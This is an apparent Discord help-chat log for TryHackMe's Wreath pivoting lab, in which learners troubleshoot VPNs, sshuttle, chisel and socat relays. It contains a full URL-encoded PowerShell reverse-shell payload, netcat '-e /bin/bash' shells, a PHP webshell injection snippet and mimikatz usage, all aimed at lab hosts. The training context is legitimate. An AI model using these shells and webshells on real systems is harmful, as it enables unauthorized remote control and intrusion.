i'll DM you then

i am not able to install chisel in my OS

error message?

Anyone else here working on 10.200.96.200? Can't ping the box... Just started with wreath and trying to enumerate the webserver... I see 3/8 to reset the Network

VPN isup

wait for 5 mins it will

unable to locate the chisel

screenshot what you're doing

okay wait

which task are you on? 14?

$ sudo apt install chisel
[sudo] password for kash:
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package chisel

nop

36

in task 14: "Before we can use chisel, we need to download appropriate binaries from the gtihub page", with a link

yes i say Darkstar video

well, I'm just going off the instructions in the room

okay wait i think i got something

hah, Muiri, Thomas uses cmder ❤️

Or, I do, and needed to develop a website

either way.

❤️ cmder

the page is not opening on 10.200.90.100

even after opening two proxy

you have a sshuttle to .150?

and an evil-winrm shell there? And an open firewall port? And a chisel server there? And a chisel client on your machine? And your proxy configured?

and an evil-winrm shell there? And an open firewall port? And a chisel server there? And a chisel client on your machine? And your proxy configured?

yes sir!

does your chisel client on your local machine say it's connected?

yes sir!

how'd you configure the proxy?

1. sshuttle

then on windows machine chisel server and on my machine chisel client

then i try to open the page on 10.200.90.100

i will see tomorrow now

i'm betting your proxy is wrong

did you skip the proxychains.conf and foxyproxy setup?

I'm having a heck of a time trying to upload a file to my local updog server from the .100 machine using curl. I've tried a variety of commands and options, many variations on:
curl -F "file=@C:\full path\output.txt" --url <my ip:port>, but curl doesn't like any of the things I've tried. I've been googling and trying a bunch of stuff. Any tips/suggestions?

Muiri- is c:\windows\temp\ supposed to be writable on the .100 machine? I thought I had previously used the php shell to curl netcat there, but it's not there now, and I can't write anything to that dir

um is the wreath down ?

i got internal server error

there are many instances of the wreath network. Which one are you one (third octet of the IP) ? What are you doing when you get that error? ssh? browser? other?

nvm it works rn

have got some issues too, cant reach 10.200.111.200 anymore,.
Network ist up for 42m

i've already regenerated the *.ovpn, host still not resolvable

Tried ssh, http and imcp btw

On task 42, I've compiled and copied my wrapper.exe to the target. When I execute it, I get the following error:
Unhandled Exception: System.ComponentModel.Win32Exception: The file or directory is corrupted and unreadable
at System.Diagnostics.Process.StartWithShellExecuteEx(ProcessStartInfo startInfo)
at Wrapper.Program.Main()

The program compiled without warnings or output of any kind, and the 'file Wrapper.exe' shows the same output as shown in the task42 instructions. Has anyone seen this before/have any ideas?

the only thing I can spot that I did differently than the instructions is the path to nc-name.exe. In my case, I had to put it in the xampp /uploads dir, because c:\windows\temp is not writable for me (or from the php web shell). I think that changed since yesterday. Perhaps something/someone changed the permissions? The network reset about 18hr ago (not sure if it's been reset since then)

I've tried recompiling the .cs file with different paths: "%TEMP%\nc.exe", "c:\Users\T...\AppData\Local\Temp\nc.exe", no path (just filename), "C:\xamp....\uploads\nc.exe", etc. All of them give me the same error, except for the %TEMP%, which gives a 'system cannot find the file specified' error.

So am I compiling this thing wrong? Is it something broken on my machine? Or is this a directory permissions issue on the .100 box?

Should be nc-username...

it is. I just shortened that here for brevity

I have a problem with the CVE-2019-15107 exploit at the beginning. Always got the output [-] Failed to connect to http://10.200.80.200:10000/. Can someone help me (no vpn problem)

I don't recall having to put a port on mine. Maybe that's the issue?

I didn't do it either. The command I used was python3 CVE-2019-15107.py 10.200.80.200

Sorry, I was looking at the wrong python file. That one does have a -p port option, which defaults to port 10000. But if it can't connect, maybe check to make sure the network is up, the host is up, and you're on the vpn?

No problem. I tried pinging the computer and restarting the VPN but it has no effect.

what does your ping return?

the normal output 64 bytes...

so no packets lost?

can you connect to the web server on the .200 machine, port 10000?

no

maybe its not a problem on my site

i'm not sure, sorry 😦

Honestly sounds like your VPN is not connected.

I think not, bc I'm able to ping it and open the webserver on port 80

Ok, then it sounds like someone broke the machine. You'll want to vote for a reset.

I already did, just have to wait for 5 more people to vote, but thanks

found the issue with my wrapper.exe- the nc-name.exe had gotten corrupted somehow. Had to re-transfer it

Muiri- typo, task 43 "Mimkatz passed Defender" should be past, I think.

Sorted

You, sir, are speedy 🙂

Minor nitpick on the copying/moving command- some people might not initially see that you have to copy both (since you only show one command). I did a move *.bak ....., but I could see some people skipping the second file

I can't delete my %TEMP%\nc-emptybuffer.exe- I think because it's still in use with my revshell

also, is there something doing an auto copy between ||c:\windows\temp, c:\users\T...\temp, and c:\xampp...uploads|| ? I see duplicate files there that I'm pretty sure I didn't put in those places.

Just finished the room. Very , very well done/written, Muiri. Huge thanks for putting all that together!

cool!

Muiri, if you have a minute, can I DM you about something?

Muir's just gone to bed

Ah, okay. Good 🙂

The patches were all rolled out earlier in the week. What seems to be the problem?

oh I wasn’t in the know :) sorry

No worries, just checking if there was another issue we missed.

is it necessary to make an ssh connection from my machine to the machine i got a reverse shell on, in order to acces the second in the chain?

asking this bcs im stuk at task 18

I have a problem getting to the ||gitstack|| side of the network after sshuttle it’s says connected but when I put the ip in browser then i get thomaswreath.thm webpage. Any idea why?

you using the right ip address for gitstack?

From my Nmap scan from the server(binary)? Yes

top of task 18 "Thinking about the interesting service on the next target that we discovered in the previous task, pick a pivoting technique and use it to connect to this service, using the web browser on your attacking machine! "

which ip address are you connecting to or trying to (can spoiler tag it I guess)

||10.200.91.200||

ok thats the prod-serv

Yep

you should have enumerated the ip of the other servers

i imagnie

so try those

Mmmm

(though only one will be accessible)

I sure would try again

Ty

I'm imagining you thought sshuttle would redirect the traffic of it's own host but it actually just acts as a network pivot for your attacker machine to access what it can access.

Interesting

Yep

when i try to connect via shuttle it says key file permissions too open but when i change them to 600 it errors out saying permission denied

it sounds like an issue with your id_rsa

can you SSH withit?

Hey guys is someone blue teaming the main server on the Wreath network?

The port running the vulnerable service is closed and I think the SSH key has changed...

haha

yea that is ture

I just checked, port 10000 is now closed and the ssh key have been changed

Pls vote for reset the network!!

and PLS be kind! do not messed thing up for another user!

pls be kind and don't dm ppl without asking

also not everyone on wreath is on the same "network" as I believe there are multiple instances of it

so you might just have to wait for Muir or someone to check it out, maybe try another room in the meantime 🙂

it is resetting now, only needed 1 more vote

thank anyway 😄

When you're asking for a reset, you need to specify what network you're on. That's shown by the 3rd octet in the IPs.

How did you solve the bonus question in task 20? About adapting the code..

I would suggest having a read through the first exploit (from my Github) to see how the pseudoshell there works

Essentially you would add a while True: loop on at the end of the exploit to accept a command from the user and send it off in a web request to your shell, at the simplest level

Okay easy thanks 🙏

when i type "shell" n the pseudoshell i get asked to enter the IP of the server, i cannot enter anything there

is it only me?

Muiri, if/when you have a minute, I have a DM question for you

Go for it

do i have to setup a reverse connections via ssh ? for task 18

I don't have my notes in front of me, but you need ssh for the .200 box, and a sshuttle connection (or something else) for .150 and beyond

hmm yh i get an error when trying sshuttle -r root@10.200.112.200 --ssh-cmd "ssh -i id_rsa" 10.200.112.0/24 -x 10.200.112.200

Permissions 0644 for 'id_rsa.pub' are too open.

do i also have to chmod it to 600?

yep

root@10.200.112.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
c : fatal: c : failed to establish ssh session (2)
``` when i chmodded  the .pub key to 600 :/

Why are you using the public key?

Why is it using the public key?

bcs... i am dumb >.<

but then i get this error when using the private key ```
└─# sshuttle -r root@10.200.112.200 --ssh-cmd "ssh -i id_rsa" 10.200.112.0/24 -x 10.200.112.200 99 ⨯
Load key "id_rsa": invalid format
root@10.200.112.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
c : fatal: c : failed to establish ssh session (2)

The command there shows just id_rsa so I'm confused

That "error" about invalid format doesn't usually prevent you logging in

Someone might have broken the box, check that the public key in authorized_keys hasn't been changed

I can still access it

Are you on 112?

oh my bad, im not

yes via reverse shell atm

Was talking to pi0neer

oh sorry

make sure the last line of the id_rsa file is blank. That might be the source of the invalid format error

thankk you! that fixed it

I made that mistake before. Took me forever to figure that one out 🤦‍♂️

i could only imagine how much hair you had to pull out of your head lol xd

I may have found an issue with the questions on thm. On task 17 you are supposed to name the other machines ip addresses and the solutions offer 100 and 150 (as the last octets of the ip). However, when I scan the network, it tells me that 150 and 250 are the machines that are on the network. Ive tried a bash one-liner and nmap 🤷

My guess would be your network is bugged. Which network are you on (third octet of the IP)?

107

Perhaps Muri or James can comment on that. I can't really help there, sorry.

its weird because I was on another network before (118) and the scan performed the same

That's odd. I'm relatively confident they are supposed to be 200, 150, 100 for all, but I could be wrong.

250 is the VPN server. 100 might have been shutdown

Ohh alright, can I switch the network?

i have a question. I am currently in task 10 proxychains and foxy proxy

for using proxychains do i also have to start local port forwarding on the attack n=box?

i have a problem getting the full reverse shell, when i typ 'shell' in the pseudoshell it asks me for input. i cannot enter anything then

'did anyone else have this?

is there anyone who can see if my target is broken? I see alot of error messages

If this is not the case, please check your IP and chosen port
If these are correct then there is likely a firewall preventing the reverse connection. Try choosing a well-known port such as 443 or 53 ... this is what i have been getting all day long

i wonder how some ther people have been able to accmoplish this

seems fairly straight forward when i watch Darksec's video

yes i watched the video from dark, there he just types 'shell' in the pseudoshell

he then enters his IP, this does not work for me (ie i cannot even enter anything and the pseudoshell is in a dead state)

and when i log in there are error messages about something (did not see that in his video)

whoami

Unhandled exception in event loop:
File "/usr/lib/python3.9/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/usr/lib/python3/dist-packages/prompt_toolkit/input/vt100.py", line 168, in callback_wrapper
callback()
File "/usr/lib/python3/dist-packages/prompt_toolkit/application/application.py", line 673, in read_from_input
self.key_processor.process_keys()
File "/usr/lib/python3/dist-packages/prompt_toolkit/key_binding/key_processor.py", line 274, in process_keys
self._process_coroutine.send(key_press)
File "/usr/lib/python3/dist-packages/prompt_toolkit/key_binding/key_processor.py", line 186, in _process
self._call_handler(matches[-1], key_sequence=buffer[:])
File "/usr/lib/python3/dist-packages/prompt_toolkit/key_binding/key_processor.py", line 329, in _call_handler
handler.call(event)
File "/usr/lib/python3/dist-packages/prompt_toolkit/key_binding/key_bindings.py", line 102, in call
result = self.handler(event)
File "/usr/lib/python3/dist-packages/prompt_toolkit/shortcuts/prompt.py", line 796, in _accept_input
self.default_buffer.validate_and_handle()
File "/usr/lib/python3/dist-packages/prompt_toolkit/buffer.py", line 1877, in validate_and_handle
self.append_to_history()
File "/usr/lib/python3/dist-packages/prompt_toolkit/buffer.py", line 1385, in append_to_history
self.history.append_string(self.text)
File "/usr/lib/python3/dist-packages/prompt_toolkit/history.py", line 73, in append_string
self.store_string(string)
File "/usr/lib/python3/dist-packages/prompt_toolkit/history.py", line 294, in store_string
with open(self.filename, "ab") as f:

Exception [Errno 13] Permission denied: 'commands.txt'
roots ENTER to continue...

like that

@hallow eagle you're running the exploit somewhere you don't have permission to write to

can anyone help me out i am stuck hop module

but I am getting compilation error

that was stupid 🙂 ty

got it

hi! webserver seems destination unreashable

*unreachable

a rertart of my kali guest solved it

I am having real problems with task 20 on wreath, I'm hoping someone can help.
I'm successfully running commands on git-serv using the specified exploit.
I'm running nc -lvp 8888 on my local machine.
I have a shell on prod-serv and have run ./socat tcp-l:15667 tcp:10.50.85.65:8888 & which is still running in the background.
I have confirmed that git-serv can talk to prod-serv on 15667 and I can create a reverse shell from prod-serv to my local machine (10.50.85.65) on 8888

I don't understand why my reverse shell from git-serv doesn't get forwarded to my local machine and I'm not sure how to troubleshoot this.

This room is killing me

hey guy's
if i left the network sleep my session like ssh etc ... gonna terminated ?

Yes

Try connecting to your relay from your attacking machine

If you can do that then the firewall is configured correctly

If you still have the key you can connect back 😄

Hi all, is it just me or Wreath is being very slow?

First I've heard of it, so possibly you

What's up with it?

SSH connection randomly drops out and is slow to connect back on

That sounds like a VPN thing to me. Are you on the AttackBox?

from the attacker's box **

Are you using your own VM or the THM AttackBox?

THM AttackBox

Did you start the VPN manually?

I will restart the system and try again, thanks a lot 🙂

Don't start the VPN directly -- it does it automatically

Is the vpn inside the attackbox associated in any way with my private opvn connection, as in If I had both my VM and the attackbox connected will these clash together?

If you have the Wreath VPN connected in two places then there will be problems

But connecting the Wreath VPN alongside your regular VPN is fine

make sense now thank you @merry robin

one more thing if I may ask, in task 19 I updated the IP address and converted from dos2unix and updated the exploit to exploit-myusername.php but I get a 404 when I run the exploit. it says the credentials are not correct. am I missing something here? there wasn't any reference to credentials in the task docs. I am using sshuttle to pivot

It sounds like you might have edited the wrong part of the exploit

it's working now thanks! I am ashamed of what the pitfall was 😊

Question: if I share a local folder on a newly created user account on .150, will it be shared in my current session/user or system wide with any users using the system?

I m at task 13 and tring to get a reverse shell with socat to my attacking machine.

I transfered both socat and nc executabbles on production server.

upon running nc on production server to get a reverse shell i get the following error. 2021/04/11 05:08:46 nc-drunkenstein[2510] E exactly 2 addresses required (there are 4); use option "-h" for help.I used the follwoing commands ./socat-drunkenstein tcp-l:8000 tcp:10.50.93.52:443 & and ./nc-drunkenstein 127.0.0.1 8000 -e /bin/bash

here is a screenshot

@open nebula your socat thinks it's netcat there

i.e. you seem to have uploaded them the wrong way round

I used curl to upload them.What should I do now?

Excellent idea, thanks

No dice I'm afraid.
My machine: nc -lvnp 4444
Web Server: ./sikotic-socat tcp-l:15666 tcp:10.50.85.65:4444 &
Payload: curl -X POST http://10.200.84.150/web/sikotic-exploit.php -d 'a=powershell.exe%20-c%20%22$client%20=%20New-Object%20System.Net.Sockets.TCPClient('10.200.84.200',15666);$stream%20=%20$client.GetStream();%5Bbyte%5B%5D%5D$bytes%20=%200..65535%7C%25%7B0%7D;while(($i%20=%20$stream.Read($bytes,%200,%20$bytes.Length))%20-ne%200)%7B;$data%20=%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString($bytes,0,%20$i);$sendback%20=%20(iex%20$data%202%3E&1%20%7C%20Out-String%20);$sendback2%20=%20$sendback%20+%20'PS%20'%20+%20(pwd).Path%20+%20'%3E%20';$sendbyte%20=%20(%5Btext.encoding%5D::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()%7D;$client.Close()%220'

Web Server firewall:

[root@prod-serv ~]# firewall-cmd --list-all
public (active)
  target: default
  icmp-block-inversion: no
  interfaces: eth0
  sources: 
  services: cockpit dhcpv6-client http https ssh
  ports: 10000/tcp 21059/tcp 15666/tcp
  protocols: 
  masquerade: no
  forward-ports: 
  source-ports: 
  icmp-blocks: 
  rich rules: 

What am I not understanding?

EDIT:
I've also just run ./sikotic-nc 127.0.0.1 15666 -e /bin/bash on WebServer and got a reverse shell, so I think the firewall and relay are working correctly, but my payload doesn't work.

Very frustrating, it was the URL encoding in CyberChef. When I used your suggested website it worked.

This room is incredible but I completely underestimated how much I was going to learn.

Does anyone know why the webmin exploit is executed on port 80 and not 10000? (Like: exploit.py $IP:10000)

Oh nvm

Just read the code arguments

Anyone else getting a Failed to connect to http://10.200.80.200:10000/ error when trying to run ./CVE-2019-15107.py? I'm connected to the Wreath VPN btw.

Since the IPs have changed, i had to get a new || ssh key for machine-1|| but its always telling me || invalid format ||

didnt have that problem before

The keys aren't different tho

With my old one it refused the connection

Oh yeah theyre the same

didnt even notice

i reverted the key and its still invalid format

Refused connection = closed port

why should the ssh port be closed?

Either the network is asleep or someone is trolling

Hi Guys I want send Json Data to target Ip how can i do it?

Sample: 89.163.142.192:30120/players.json

@brittle steeple
A) What does that have to do with Wreath?
B) Why are we targeting public IPs?

What?

What's on that IP?

Good morning all. Looking for a bit of guidance on stabilizing the wreath remote shell

I've been trying for two days now and it keeps breaking the Shell

As soon as I foreground netcat it just completely breaks and just types characters when I hit ENTER or CTL+C

I'm on task 13 and trying to get the reverse shell, I uploaded both netcat and socat executed the command but I don't get the reverse shell

and also I wasn't able to curl to get those binaries

so I used scp to upload it

I'm stuck on task 6 because I just cant get past stabilizing the damn thing

I first set up the listener

then

but I don't seem to get any shell

Didn't think you need to run netcat as root. I don't think I can help you but once I get to that question, if ever, I'll see what's up

for lower ports you have to run it with root perms

ports lower than 1000 require permissions bro

1024, technically

yeah 🙂

Learned something new today. Thanks guys

seem like webserver (.200) on my network is down (3rd octedt of my network = .101) can anyone check it?

@fair breach is 101 down by any mischance?

Lemme take a look

@merry robin

.101.250 which is the vpn which is up the rest are stopped

@jaunty oak is the network started?

Is root@prod-serv unable to ping the thm-attackbox ??

I got it ....

it is working now. thank you

hello there

can anyone help me reset network?

am VIP and still there is reset button

idk how this is going xD

You need to specify which subnet you're on

Otherwise people won't know what network needs to be reset

ah how I tell?

Should be the third part of the ip

the 3rd octet of your ip

ah gotcha

10.50.91

ah anyone plz restart this )

I've just started to exploit the network and it seems Port 10000 is closed and is refusing connections?

That'll be 90 then

10.200.90.200, I imagine

Is the network started?

I'm an idiot

I didn't notice the "start" button

Wait it is running

@merry robin yea

network is started @merry robin

If it's running and has been up for more than about 5 minutes, go for a reset

Alright

I clicked reset it says 1/8

If someone's been messing around and brought a machine down, you'll find that the others in the network go for resets pretty quickly as they won't be able to access it either

ok

but can you reset network for me?

Not until I get my fancy management interface

ok

Well for some reason mine is also down :C

Can't even ping the .200 machine

woah 👀

Someone plz gib Muir and cry and spuki some nice management interfaces

They're in the works

for just networks right? just wondering

hey guys, i got some questions over here

any of you can reach the 10.200.106.150 machine after setting up sshutle to the .200 server?

its appears to be up, since i can run an nmap scan to .150 from the .200 server, but when i pivot with sshutle i can't open the webpage on port 80 in my browser

whats the error

404 :/

So you can open it

exactly :/

idk if im missing something

sshuttle -r root@10.200.106.200 --ssh-cmd "ssh -i id_rsa" 10.200.106.0/24 -x 10.200.106.200

404 isn't a network error

You're accessing it just fine -- it's a webserver error

well...

thats true

Specifically, you trying to access something that doesn't exist. Pretty sure that's also stated as the expected outcome in the room

OHHHHHHHHHHHHHH

hahahahaa

mybad

my bad

All good 🙂

Gezz dumbass me

xD

thanks anyways

can I have private wreath network? I can pay

That would be an admin question -- drop an email to support@tryhackme.com 🙂

!!

I'm assuming you'll pass it to Skidy/Ashu Jabba 🤷‍♂️

They're super busy, I'll see if I can get an answer and get it pinned here

Private Wreath Networks
Hey!
We do create private Wreath networks.
Please send all private Wreath network enquires to ben@tryhackme.com :)

@simple spire ^

woah really

interesting

Oooh, cool

I am having difficulty in a task, when I try to run the exploit it returns me the following error:

./43777.py
[+] Get user list
Traceback (most recent call last):
File "./43777.py", line 46, in <module>
r = requests.post("http://{}/rest/user/".format(ip), data={'username':username,'password':password})
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/api.py", line 119, in post
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/api.py", line 61, in request
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 530, in request
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 665, in send
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 245, in resolve_redirects
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 643, in send
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/adapters.py", line 516, in send
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='thomaswreath.thmrest', port=443): Max retries exceeded with url: /user/ (Caused by NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x7f8d71bd7b90>: Failed to establish a new connection: [Errno -2] Name or service not known',))

thomaswreath.thmrest there's the issue

but on my "hosts" it's OK, thomaswreath.thm

Yes but that URL there looks wrong. Did you edit the exploit or are you supplying the URL as an argument?

Also, it says IP so did you try with the ip?

Yes, I edited the exploit, put the IP I'm going to try through DNS

There is no DNS

I downloaded the exploit again and edited it and it worked, some dirt had been left in the exploit, but now it gave a different error ...

"
Notice: Undefined index: a in C:\GitStack\gitphp\exploit-tiagobob.php on line 1

Warning: system(): Cannot execute a blank command in C:\GitStack\gitphp\exploit-tiagobob.php on line 1
"

webserver shows this error

Best name ever: TiagoBob

😆

I identified that the flaw is in this part of the exploit

'p && echo "<? php system ($ _ POST [' a \ ']);?>">

you gotta supply a parameter a

gitstack-username.php&a=ls

anyone else having issue with connecting to the smbserver?

net use \\<attacking-ip>\share /USER:user s3cretP@ssword
System error 53 has occurred.

The network path was not found.

Ok. The problem was my firewall.

Wreath does not count as an entryway to the 'advanced' discord channel, correct?

Not as of yet certainly. Haven't really considered it

In the wreath room, i am getting pings for the first system(.200) but for the other 2 (.150, .100) I am not getting any pings. Yesterday I was able to get into 2nd system. I even tried to run the exploit 43777.py and it's giving "connection timed out". I was even able to get a shell from .200, but no response from .150 and .100. What should I do? Should I vote to reset the system?

Anyone? Any suggestions ?

You probably wouldn't be able to ping them anyway, given they're Windows boxes -- although that definitely doesn't look to be connecting

To confirm, you do have sshuttle running, yes?

Anybody else having connectivity issues?

I'm not getting any ping response from the server

I don't think you need to be connected with sshuttle, since that is the first exploit to be run @astral pendant

That exploit is for the .200 machine if I'm not mistaken

Which server?

Sometimes the network dies because there is no activity for a while

So try refreshing the page and see if the network is running

Networks aren't based on activity, you need to actually extend them manually

Oh ok

I though activity also had a role in the network uptime

cuz of this

But what if we are in the same network, and you have a hour and a half

Will I also have a hour and a half?

Nope.

Yes.

Oh ok, nice!

My VPN crapped out so I just restarted it and it's all good

Nicee

sry a little late but you can use powershell to look at found threats using

Get-MpThreatDetection

I'm having a problem with the ||SSH Key|| on machine-1

It keeps saying "invalid format"

I had the same problem try adding a blank line in the end of your private key. That solved it for me

...

Fixed it, thanks!

can some of you help me restart the wreath network as it seems that the main public facing server is down. I just need 3 more votes to restart the network. I would really appreciate your help. Thanks in advance

i am getting the same issue now

Looks like reboot is taking place! @fresh fossil

What fixed my issue is that for whatever reason my openVPN closed out so once I reconnected to wreath it was all good

In the wreath room i am stuck at TASK - 6 , when i am pasting root user's password hash i am getting an invalid response. can someone help me please?

I have checked the walkthrough video , it is working for him but not for me

Did you copy just the hash part?

yes

Does it start with $ and ends with 1 ?

i have sent a screenshot of it.

I don't think that's the right hash

The / is actually a part of it FYI

But someone might have changed it

Yeah my hash is different

Someone's changed it.

i have included / in the response , but it still says invalid response

As I said, someone's changed it

so what should i do? to fix it?

If you're close to a reset, do that. Otherwise disconnect and DM me the VPN config

We just did a reset right before the website went down

You know there are 80 different networks, right?

Unless you both have the same third octet, you won't have reset the same one

Oh ok. I didn't know thanks

I have disconnected , and sent you my vpn config file.

This is why I love this community. Every day I learn something new

Definitely ^^

do i have to || use empire to port scan 10.200.xxx.<the other one>|| ?

nvm i figured it out

I'm not able to scan the network

half the day seems the network is down 🙁

Same for me

2 more votes needed to reset

has it ever worked?

make sure you have downloaded the separate openvpn config file for wreath

Yesterday also it got reset but i didn't felt like it changed. Still had issue with second and third systems(.150 and .100)

did u download the separate ovpn config file for wreath?

Ya I har already downloaded the VPN for the wreath network and run it. Only after that i had checked the network.

The one with our username-wreath.ovpn

Right?

yes

Its running in my system..

I've regenerated the vpn for 4 times

Should i try regenerating it, will the issue be fixed??

What network are you on? What's the third octet? @echo frigate

What's the actual issue you're having at the moment?

.111

Sorry

.111

Just now when I tried nmaping the whole ip ranges. It's showing only .255 is up

You can only talk to the public web host machine, if it's working correctly

Yesterday when I tried to exploit the second system using 43777.py, its giving me error saying connection timed out even though the machine was running.

That might be your pivot.

I don't know bro, day before yesterday I tried running that same pivot and it got executed well and I was able to get into the 2nd system and done task till 24. But on the next day onwards this is what's happening.

Not your bro, but if you can talk to the first machine it's not likely to be a VPN issue

I dont know bro, but today i not even able to talk with 1st machine..

Still not your bro

If you can't talk to the first machine then you definitely can't pivot to the second

can that be a code error

No

or try python3 34324234.py

That screenshot which I shared was yesterday's result..

If they cannot communicate with the first machine, they definitely can't use it to pivot to the second

This is today's case..

Any suggestion guys??

If I'm wrong also, please correct me..

89

I am looking for help some reason my netcat listener wont connect to wreath machine

!docs verify

Follow these steps, then you can post images

lost possibility to connect via ssh key. before it worked perfectly; even copied again id_rsa from .200 but the issue persists: root@10.200.91.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

Try with “sudo” @river talon

sudo doesn't help / someone has to do something to authorized keys probablly

Yup... then you have the wrong keys bud

Someone might have changed it. It's not necessarily a problem on their end, in fact it's unlikely to be.

It's set to not allow changes to be made, so if someone has changed it then they have actively circumvented those (assuming you're using the same key as before). Go for a reset (and let me know if it hasn't happened in a couple of hours @river talon). If I find out who changed it I will happily ban 'em.

Oh, that reminds me, I need to make the keys themselves immutable too.

hey guys I cannot ssh into .200 is there someone who's facing the same issue ? .. 😦

until yesterday I was able to

but today it's suddenly unreachable

can anyone help ?

Is the .200 down ?

Are you connected to the VPN?

yup

Have you voted to reset the network?

Actually few minutes before I had the winrm shell into the internal network but now it's not connecting and even not able to ssh into .200

yes

Is there an official announcement time or the report contest results?

Yep. Yesterday (17th) the competition ended. I've been going through the reports -- the results should be announced today 🙂

Hey, just started wreath and tried scanning the first machine. It is up but it says all ports are filtered because of no responses

nevermind im an idiot, didnt see theres a separate vpn file for wreath x)

Is the network ok? I cant ssh to any host

There's like 80+ instances of wreath, please be specific

the first server is 10.200.99.200

hay guys any help for solve this error
/tmp/socat-als3idy: error while loading shared libraries: libwrap.so.0: cannot open shared object file: No such file or directory

That's not a static copy of socat

i solve it

Im really loving the room so far but how cancer is the machine crashing every 30 min -.-

Is there any way someone can reset the lab for us? 5/8 people voted already and the rest is probably afk so we can't access the network right now

What network? There's 80+ instances of wreath running at any time

the one starting with 10.200.101.x.
Edit: thanks!

boo my ping scanner isn't working...ICMP is hard 😦

there we go.

Who won the $?

You'll find out soon 👀

The finalists are in Skidy's hands now 🙂

I am currently solving task 13 (pivoting socat).I have one question do we have to perform port forwarding --quiet and port forwarding --easy as described in task on the compromised server??

i am currently at task 20{gitserver exploitation} i have changed the ip addr in the exploit and done dos2unit also but the payload is not working

can someone please help?

There’s a few reasons that I can think of on why this is occurring, I haven’t completed Wreath although.

-> There’s something wrong with your VPN.

-> There’s something wrong with the network you’re on.

-> It is unable to connect.

Some common fixes:

-> Run the VPNscript.

-> Vote to reset the network.

-> Make sure the information in the script has been inserted correctly.

-> Wait for someone else who has completed the network to help :)

ok :}

Another issue: whenever I run the stager payload from empire on prod-serv it crashes the network. I followed the steps from task 27

So the 10.200.101.0/24 network needs another reset now again x)

hi, I have an issue I can use some help 🙂 when I connect to the network (10.200.101.200) I trying to ping the attacking pc but it does not work, the target does not recognize the attacking pc after I connect throw ssh... I want to learn why. not find another way to overcome this, thanks!

What IP are you pinging @steady sluice?

the private ip

Which private ip...

10.10.97.207

@merry robin sorry I forgat to tag

That's not your VPN IP @steady sluice

It should be 10.50.x.x

I dont use VPN

Even the AttackBox needs a VPN to connect to networks

It just gets started automatically

why is this matter?

It should be easier without VPN, no?

Because only a 10.50 IP can access the network. That's what the AttackBox used to connect to the machine in the first place, and that's what you need to use when connecting back.

The AttackBox starts your Wreath VPN automatically when it boots, but it's still just a VPN

so what can I do?

if the VPN start automatically I cant control it @merry robin , can I check if the VPN is on?

You can check your VPN IP with ip a s tun0 and use that

that's works, thanks!

hmm, I can't seem to get sshuttle working properly against the pivot server

sshuttle -r "root@10.200.102.200" --ssh-cmd "ssh -i ../10.200.x.200/id_rsa" 
10.200.102.0/24
[local sudo] Password:
c : Connected to server.
# Warning: iptables-legacy tables present, use iptables-legacy to see them
iptables v1.8.7 (nf_tables):  CHAIN_ADD failed (No such file or directory): chain OUTPUT
# Warning: iptables-legacy tables present, use iptables-legacy to see them
iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'OUTPUT', '-j', 'sshuttle-12300'] returned 1
iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'PREROUTING', '-j', 'sshuttle-12300'] returned 1
fw: fatal: fw: ['iptables', '-t', 'nat', '-I', 'OUTPUT', '1', '-j', 'sshuttle-12300'] returned 4
c : fatal: cleanup: ['/usr/bin/sudo', '-p', '[local sudo] Password: ', '/usr/bin/env', 'PYTHONPATH=/usr/lib/python3/dist-packages', '/usr/bin/python3', '/usr/bin/sshuttle', '--method', 'auto', '--firewall'] returned 99

chisel works though

Try running that with sudo?

same

wait

yeah same

What OS?

Kali on WSL2

I need to look into how to set an exception for proxychains to avoid trying to proxy my display server for RDP

Has WSL2 fixed the networking problems of WSL, or is it still basically just your host with an extra layer?

it's basically a VM

Because, uh, iptables sure as heck wouldn't do anything on WSL

ah it's trying to open that locally?

Yep, that's how sshuttle works

It basically sets up an SSH local proxy then changes your firewall to add forward rules through the proxy

ok, there are no local rules defined, but it might cause issues with the host net?

there's some voodoo between them anyways

Yeah, I would imagine there isn't enough separation on WSL2 for the guest to act independently

ok there we go

localnet 172.16.0.0/255.240.0.0
localnet 192.168.0.0/255.255.0.0

This helps in the proxychains conf:)

ok mimikatz priv esc doesn't seem to be working...

mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

looks like an error

no really?

wait I'm an idiot

thats an error maybe

Guess who forgot to run as admin

system error in you

Hence you are an AI

beep boop

I HAVE BEEN DISCOVERED. INITIATE PROTOCOL ID-10-T-ALPHA. EXTERMINATE!

@merry robin any solutions?

Doesn't look like it's able to connect to 150. Make sure sshuttle is active, etc

Ok

hey Muiri! My room writeup got accepted!

But two of my writeups have been uploaded, one of which had an issue and I had reported it to you! So can you remove the writeup whose link does not work (ig the first one in the list, but check it )! Thank you

I would have accepted the second one on the list

Oh, no, I accepted both of them, oops

I'll delete the first one

Thank you!

anyone else had issues with rdp to .150 ?

tried xfreerdp and remmina

both prompt for password but fails....

creds fine as I can winrm

am I the only one having the network down since a few hours ? it worked fine until the state had to stop because of extend limit, then when it started again nothing worked, can't even nmap it, it says everything's filtered

we're at 4/8 reset

of course, just after I send that, the network stops so I restart it again and now it works

worked fine for me once I got proxychains sorted out

